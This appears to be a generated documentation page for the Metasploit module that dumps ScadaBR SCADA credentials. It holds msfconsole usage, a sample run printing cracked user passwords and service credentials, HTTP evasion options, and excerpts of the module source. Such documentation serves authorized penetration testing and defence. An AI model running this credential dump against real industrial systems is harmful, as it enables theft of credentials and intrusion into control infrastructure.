ScadaBR Credentials Dumper - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/scadabr_credential_dump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ScadaBR Credentials Dumper
Module: auxiliary/admin/http/scadabr_credential_dump
Source code: modules/auxiliary/admin/http/scadabr_credential_dump.rb
Disclosure date: 2017-05-28
Last modification time: 2021-02-22 15:51:02 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -
This module retrieves credentials from ScadaBR, including
service credentials and unsalted SHA1 password hashes for
all users, by invoking the EmportDwr.createExportData
DWR
method of Mango M2M which is exposed to all authenticated
users regardless of privilege level. This module has been
tested successfully with ScadaBR versions 1.0 CE and 0.9 on
Windows and Ubuntu systems.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/http/scadabr_credential_dump
msf auxiliary(scadabr_credential_dump) > show targets
... a list of targets ...
msf auxiliary(scadabr_credential_dump) > set TARGET target-id
msf auxiliary(scadabr_credential_dump) > show options
... show and set options ...
msf auxiliary(scadabr_credential_dump) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module retrieves credentials from ScadaBR, including
service credentials and unsalted SHA1 password hashes for
all users, by invoking the EmportDwr.createExportData
DWR
method of Mango M2M which is exposed to all authenticated
users regardless of privilege level.
ScadaBR is a SCADA (Supervisory Control and Data Acquisition) system with applications in Process Control and Automation, being developed and distributed using the open source model.
This module has been tested successfully with ScadaBR versions 1.0 CE and 0.9 on Windows and Ubuntu systems.
Verification Steps
Download:
Metasploit:
- Start
msfconsole
- Do:
use auxiliary/admin/http/scadabr_credential_dump
- Do:
set rhosts [IP]
- Do:
set username [USERNAME]
- Do:
set password [PASSWORD]
- Do:
run
- You should get credentials
Options
USERNAME
The username for the application (default: admin
)
PASSWORD
The password for the application (default: admin
)
PASS_FILE
Wordlist file to crack password hashes (default: ./data/unix_passwords.txt
)
Scenarios
msf6 > use auxiliary/admin/http/scadabr_credential_dump
msf6 auxiliary(admin/http/scadabr_credential_dump) > set rhosts 172.16.191.194
rhosts => 172.16.191.194
msf6 auxiliary(admin/http/scadabr_credential_dump) > set username admin
username => admin
msf6 auxiliary(admin/http/scadabr_credential_dump) > set password admin
password => admin
msf6 auxiliary(admin/http/scadabr_credential_dump) > run
[*] Running module against 172.16.191.194
[+] 172.16.191.194:8080 Authenticated successfully as 'admin'
[+] 172.16.191.194:8080 Export successful (4735 bytes)
[+] Config saved in: /root/.msf4/loot/20210220192214_default_172.16.191.194_scadabr.config_546879.txt
[+] Found 5 users
[*] Found weak credentials (admin:admin)
[*] Found weak credentials (operator:a)
[*] Found weak credentials (test:sunshine)
[*] Found weak credentials (user:A)
[*] Found weak credentials (zxcv:zxcv)
ScadaBR User Credentials
========================
Username Password Hash (SHA1) Role E-mail
-------- -------- ----------- ---- ------
admin admin d033e22ae348aeb5660fc2140aec35850c4da997 Admin [email protected]
operator a 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 User operator@localhost
test sunshine 8d6e34f987851aa599257d3831a1af040886842f User test@localhost
user A 6dcd4ce23d88e2ee9568ba546c007c63d9131c1b Admin user@localhost
zxcv zxcv 9878e362285eb314cfdbaa8ee8c300c285856810 User zxcv@localhost
[+] Found SMTP credentials: smtptestuser:[email protected]:25
[+] Found HTTP proxy credentials: proxytestuser:[email protected]:8080
ScadaBR Service Credentials
===========================
Service Host Port Username Password
------- ---- ---- -------- --------
HTTP proxy 127.0.0.1 8080 proxytestuser proxytestpass
SMTP 127.0.0.1 25 smtptestuser smtptestpass
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/scadabr_credential_dump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.16.191.194 172.16.191.194 8080/tcp (http) admin admin Password
172.16.191.194 172.16.191.194 8080/tcp (http) operator a Password
172.16.191.194 172.16.191.194 8080/tcp (http) test sunshine Password
172.16.191.194 172.16.191.194 8080/tcp (http) user A Password
172.16.191.194 172.16.191.194 8080/tcp (http) zxcv zxcv Password
msf6 auxiliary(admin/http/scadabr_credential_dump) >
Go back to menu.
Msfconsole Usage
Here is how the admin/http/scadabr_credential_dump auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/scadabr_credential_dump
msf6 auxiliary(admin/http/scadabr_credential_dump) > show info
Name: ScadaBR Credentials Dumper
Module: auxiliary/admin/http/scadabr_credential_dump
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-05-28
Provided by:
bcoles <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes The password for the application
PASS_FILE /opt/metasploit-framework/embedded/framework/data/wordlists/unix_passwords.txt no Wordlist file to crack password hashes
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /ScadaBR yes The base path to ScadaBR
USERNAME admin yes The username for the application
VHOST no HTTP server virtual host
Description:
This module retrieves credentials from ScadaBR, including service
credentials and unsalted SHA1 password hashes for all users, by
invoking the `EmportDwr.createExportData` DWR method of Mango M2M
which is exposed to all authenticated users regardless of privilege
level. This module has been tested successfully with ScadaBR
versions 1.0 CE and 0.9 on Windows and Ubuntu systems.
Module Options
This is a complete list of options available in the admin/http/scadabr_credential_dump auxiliary module:
msf6 auxiliary(admin/http/scadabr_credential_dump) > show options
Module options (auxiliary/admin/http/scadabr_credential_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes The password for the application
PASS_FILE /opt/metasploit-framework/embedded/framework/data/wordlists/unix_passwords.txt no Wordlist file to crack password hashes
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /ScadaBR yes The base path to ScadaBR
USERNAME admin yes The username for the application
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the admin/http/scadabr_credential_dump auxiliary module:
msf6 auxiliary(admin/http/scadabr_credential_dump) > show advanced
Module advanced options (auxiliary/admin/http/scadabr_credential_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/scadabr_credential_dump module can do:
msf6 auxiliary(admin/http/scadabr_credential_dump) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/scadabr_credential_dump auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/scadabr_credential_dump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER> Connection failed
Here is a relevant code snippet related to the "<PEER> Connection failed" error message:
50: 'password' => Rex::Text.uri_encode(pass, 'hex-normal')
51: }
52: })
53:
54: unless res
55: fail_with(Failure::Unreachable, "#{peer} Connection failed")
56: end
57:
58: if res.code == 302 && !res.headers['location'].include?('/login.htm') && res.get_cookies =~ /JSESSIONID=([^;]+);/
59: @cookie = res.get_cookies.scan(/JSESSIONID=([^;]+);/).flatten.first
60: print_good("#{peer} Authenticated successfully as '#{user}'")
<PEER> Authentication failed
Here is a relevant code snippet related to the "<PEER> Authentication failed" error message:
57:
58: if res.code == 302 && !res.headers['location'].include?('/login.htm') && res.get_cookies =~ /JSESSIONID=([^;]+);/
59: @cookie = res.get_cookies.scan(/JSESSIONID=([^;]+);/).flatten.first
60: print_good("#{peer} Authenticated successfully as '#{user}'")
61: else
62: fail_with(Failure::NoAccess, "#{peer} Authentication failed")
63: end
64: end
65:
66: def export_data
67: params = [
<PEER> Connection failed
Here is a relevant code snippet related to the "<PEER> Connection failed" error message:
100: 'ctype' => 'text/plain',
101: 'data' => params.join("\n")
102: })
103:
104: unless res
105: fail_with(Failure::Unreachable, "#{peer} Connection failed")
106: end
107:
108: config_data = res.body.scan(/dwr.engine._remoteHandleCallback\('\d*','\d*',"(.+)"\);/).flatten.first
109:
110: unless config_data
<PEER> Export failed
Here is a relevant code snippet related to the "<PEER> Export failed" error message:
106: end
107:
108: config_data = res.body.scan(/dwr.engine._remoteHandleCallback\('\d*','\d*',"(.+)"\);/).flatten.first
109:
110: unless config_data
111: fail_with(Failure::UnexpectedReply, "#{peer} Export failed")
112: end
113:
114: print_good("#{peer} Export successful (#{config_data.length} bytes)")
115:
116: config_data
<PEER> Could not parse exported settings as JSON.
Here is a relevant code snippet related to the "<PEER> Could not parse exported settings as JSON." error message:
143: print_good("Config saved in: #{path}")
144:
145: begin
146: json = JSON.parse(config.gsub(/\\r/, '').gsub(/\\n/, '').gsub(/\\"/, '"').gsub(/\\'/, "'").gsub(/\\\\/, '\\').gsub(/\\\r?\n/, ''))
147: rescue StandardError
148: fail_with(Failure::UnexpectedReply, "#{peer} Could not parse exported settings as JSON.")
149: end
150:
151: service_data = {
152: address: rhost,
153: port: rport,
Found no user data
Here is a relevant code snippet related to the "Found no user data" error message:
163: )
164:
165: users = json['users']
166:
167: if users.empty?
168: print_error('Found no user data')
169: else
170: print_good("Found #{users.length} users")
171: @wordlist = *'0'..'9', *'A'..'Z', *'a'..'z'
172: @wordlist.concat(['12345', 'admin', 'password', 'scada', 'scadabr', datastore['PASSWORD']])
173: load_wordlist(datastore['PASS_FILE']) unless datastore['PASS_FILE'].nil?
Go back to menu.
Related Pull Requests
- #14784 Merged Pull Request: Update ScadaBR Credentials Dumper module
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12354 Merged Pull Request: Remove targets from aux and post modules
- #11234 Merged Pull Request: revisionism
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8473 Merged Pull Request: Add ScadaBR Credentials Dumper module
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/admin/backupexec/dump
- auxiliary/admin/http/telpho10_credential_dump
- auxiliary/admin/vxworks/wdbrpc_memory_dump
- auxiliary/gather/windows_secrets_dump
- auxiliary/scanner/http/binom3_login_config_pass_dump
- auxiliary/scanner/http/frontpage_credential_dump
- auxiliary/scanner/http/ms15_034_http_sys_memory_dump
- auxiliary/sqli/openemr/openemr_sqli_dump
- auxiliary/admin/misc/sercomm_dump_config
- auxiliary/scanner/http/epmp1000_dump_config
- auxiliary/scanner/http/epmp1000_dump_hashes
- auxiliary/scanner/ipmi/ipmi_dumphashes
- post/linux/gather/gnome_keyring_dump
- post/linux/gather/vcenter_secrets_dump
- post/windows/gather/avast_memory_dump
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/dnscache_dump
- post/windows/gather/dumplinks
- post/windows/gather/memory_dump
- auxiliary/admin/scada/moxa_credentials_recovery
- auxiliary/scanner/http/oracle_demantra_database_credentials_leak
- auxiliary/gather/ldap_hashdump
- auxiliary/scanner/mssql/mssql_hashdump
- auxiliary/scanner/mssql/mssql_schemadump
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
- auxiliary/scanner/mysql/mysql_hashdump
- auxiliary/scanner/mysql/mysql_schemadump
- auxiliary/scanner/oracle/oracle_hashdump
- auxiliary/scanner/postgres/postgres_hashdump
- auxiliary/scanner/postgres/postgres_schemadump
- auxiliary/scanner/smb/impacket/secretsdump
Authors
bcoles
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.